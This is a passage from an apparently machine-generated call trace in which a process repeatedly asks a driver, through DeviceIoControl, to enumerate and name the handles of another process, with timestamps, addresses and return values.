Object=0xfffff88005163548*=0xfffff8a001497fc0, HandleInformation=0x0) returned 0x0 [0132.991] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.991] PsReleaseProcessExitSynchronization () returned 0x2 [0132.991] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.991] ObQueryNameString (in: Object=0xfffff8a001497fc0, ObjectNameInfo=0xfffffa8002f55044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f55044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.991] ObfDereferenceObject (Object=0xfffff8a001497fc0) returned 0x1 [0132.991] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.991] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.991] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.991] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.991] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.991] PsAcquireProcessExitSynchronization () returned 0x0 [0132.992] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.992] ObReferenceObjectByHandle (in: Handle=0x2e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013f87f0, HandleInformation=0x0) returned 0x0 [0132.992] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.992] PsReleaseProcessExitSynchronization () returned 0x2 [0132.992] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.992] ObQueryNameString (in: Object=0xfffff8a0013f87f0, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.992] ObfDereferenceObject (Object=0xfffff8a0013f87f0) returned 0x1 [0132.992] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.992] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.992] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.992] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.992] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.992] PsAcquireProcessExitSynchronization () returned 0x0 [0132.992] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.992] ObReferenceObjectByHandle (in: Handle=0x2ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013f8d60, HandleInformation=0x0) returned 0x0 [0132.992] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.992] PsReleaseProcessExitSynchronization () returned 0x2 [0132.992] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.992] ObQueryNameString (in: Object=0xfffff8a0013f8d60, ObjectNameInfo=0xfffffa8002877044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002877044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.993] ObfDereferenceObject (Object=0xfffff8a0013f8d60) returned 0x1 [0132.993] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.993] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.993] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.993] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.993] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.993] PsAcquireProcessExitSynchronization () returned 0x0 [0132.993] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.993] ObReferenceObjectByHandle (in: Handle=0x2f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001346780, HandleInformation=0x0) returned 0x0 [0132.993] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.993] PsReleaseProcessExitSynchronization () returned 0x2 [0132.993] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.993] ObQueryNameString (in: Object=0xfffff8a001346780, ObjectNameInfo=0xfffffa8002092044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002092044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.993] ObfDereferenceObject (Object=0xfffff8a001346780) returned 0x1 [0132.993] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.993] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.993] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.993] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.993] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.993] PsAcquireProcessExitSynchronization () returned 0x0 [0132.994] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.994] ObReferenceObjectByHandle (in: Handle=0x2f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010ed060, HandleInformation=0x0) returned 0x0 [0132.994] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.994] PsReleaseProcessExitSynchronization () returned 0x2 [0132.994] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.994] ObQueryNameString (in: Object=0xfffff8a0010ed060, ObjectNameInfo=0xfffffa80025f1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025f1044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.994] ObfDereferenceObject (Object=0xfffff8a0010ed060) returned 0x1 [0132.994] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.994] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.994] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.994] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.994] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.994] PsAcquireProcessExitSynchronization () returned 0x0 [0132.994] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.994] ObReferenceObjectByHandle (in: Handle=0x308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00181abb0, HandleInformation=0x0) returned 0x0 [0132.994] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.994] PsReleaseProcessExitSynchronization () returned 0x2 [0132.994] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.994] ObQueryNameString (in: Object=0xfffff8a00181abb0, ObjectNameInfo=0xfffffa80022b0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022b0044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.994] ObfDereferenceObject (Object=0xfffff8a00181abb0) returned 0x1 [0132.995] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.995] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.995] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.995] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.995] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.995] PsAcquireProcessExitSynchronization () returned 0x0 [0132.995] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.995] ObReferenceObjectByHandle (in: Handle=0x310, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001581450, HandleInformation=0x0) returned 0x0 [0132.995] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.995] PsReleaseProcessExitSynchronization () returned 0x2 [0132.995] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.995] ObQueryNameString (in: Object=0xfffff8a001581450, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.995] ObfDereferenceObject (Object=0xfffff8a001581450) returned 0x1 [0132.995] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.995] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.995] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.995] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.995] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.995] PsAcquireProcessExitSynchronization () returned 0x0 [0132.995] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.996] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0011f2300, HandleInformation=0x0) returned 0x0 [0132.996] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.996] PsReleaseProcessExitSynchronization () returned 0x2 [0132.996] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.996] ObQueryNameString (in: Object=0xfffff8a0011f2300, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.996] ObfDereferenceObject (Object=0xfffff8a0011f2300) returned 0x1 [0132.996] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.996] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.996] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.996] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.996] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.996] PsAcquireProcessExitSynchronization () returned 0x0 [0132.996] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.996] ObReferenceObjectByHandle (in: Handle=0x320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b45590, HandleInformation=0x0) returned 0x0 [0132.996] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.996] PsReleaseProcessExitSynchronization () returned 0x2 [0132.996] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.996] ObQueryNameString (in: Object=0xfffff8a000b45590, ObjectNameInfo=0xfffffa8002f79344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f79344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.997] ObfDereferenceObject (Object=0xfffff8a000b45590) returned 0x1 [0132.997] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.997] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.997] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.997] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.997] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.997] PsAcquireProcessExitSynchronization () returned 0x0 [0132.997] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.997] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0011706f0, HandleInformation=0x0) returned 0x0 [0132.997] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.997] PsReleaseProcessExitSynchronization () returned 0x2 [0132.997] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.997] ObQueryNameString (in: Object=0xfffff8a0011706f0, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.997] ObfDereferenceObject (Object=0xfffff8a0011706f0) returned 0x1 [0132.997] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.997] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.997] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.997] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.998] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.998] PsAcquireProcessExitSynchronization () returned 0x0 [0132.998] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.998] ObReferenceObjectByHandle (in: Handle=0x358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013ccc10, HandleInformation=0x0) returned 0x0 [0132.998] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.998] PsReleaseProcessExitSynchronization () returned 0x2 [0132.998] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.998] ObQueryNameString (in: Object=0xfffff8a0013ccc10, ObjectNameInfo=0xfffffa80028c56c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028c56c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.998] ObfDereferenceObject (Object=0xfffff8a0013ccc10) returned 0x1 [0132.998] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.998] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.998] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.998] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.998] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.998] PsAcquireProcessExitSynchronization () returned 0x0 [0132.998] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.998] ObReferenceObjectByHandle (in: Handle=0x368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013bd470, HandleInformation=0x0) returned 0x0 [0132.998] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.998] PsReleaseProcessExitSynchronization () returned 0x2 [0132.998] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.999] ObQueryNameString (in: Object=0xfffff8a0013bd470, ObjectNameInfo=0xfffffa80029637c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80029637c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.999] ObfDereferenceObject (Object=0xfffff8a0013bd470) returned 0x1 [0132.999] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.999] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.999] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.999] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.999] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.999] PsAcquireProcessExitSynchronization () returned 0x0 [0132.999] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.999] ObReferenceObjectByHandle (in: Handle=0x374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0015643e0, HandleInformation=0x0) returned 0x0 [0132.999] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.999] PsReleaseProcessExitSynchronization () returned 0x2 [0132.999] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.999] ObQueryNameString (in: Object=0xfffff8a0015643e0, ObjectNameInfo=0xfffffa8002540344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002540344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.999] ObfDereferenceObject (Object=0xfffff8a0015643e0) returned 0x1 [0132.999] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.999] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.999] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.999] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.999] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.999] PsAcquireProcessExitSynchronization () returned 0x0 [0132.999] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.000] ObReferenceObjectByHandle (in: Handle=0x384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017e3e40, HandleInformation=0x0) returned 0x0 [0133.000] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.000] PsReleaseProcessExitSynchronization () returned 0x2 [0133.000] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.000] ObQueryNameString (in: Object=0xfffff8a0017e3e40, ObjectNameInfo=0xfffffa8002656044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002656044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.000] ObfDereferenceObject (Object=0xfffff8a0017e3e40) returned 0x1 [0133.000] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.000] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.000] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.000] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.000] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.000] PsAcquireProcessExitSynchronization () returned 0x0 [0133.000] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.000] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017c0900, HandleInformation=0x0) returned 0x0 [0133.000] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.000] PsReleaseProcessExitSynchronization () returned 0x2 [0133.000] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.000] ObQueryNameString (in: Object=0xfffff8a0017c0900, ObjectNameInfo=0xfffffa8002f06044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f06044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.000] ObfDereferenceObject (Object=0xfffff8a0017c0900) returned 0x1 [0133.000] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.001] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.001] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.001] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.001] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.001] PsAcquireProcessExitSynchronization () returned 0x0 [0133.001] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.001] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001170410, HandleInformation=0x0) returned 0x0 [0133.001] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.001] PsReleaseProcessExitSynchronization () returned 0x2 [0133.001] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.001] ObQueryNameString (in: Object=0xfffff8a001170410, ObjectNameInfo=0xfffffa8002f2d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f2d044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.001] ObfDereferenceObject (Object=0xfffff8a001170410) returned 0x1 [0133.001] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.001] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.001] RtlAllocateHeap (HeapHandle=0x290000, 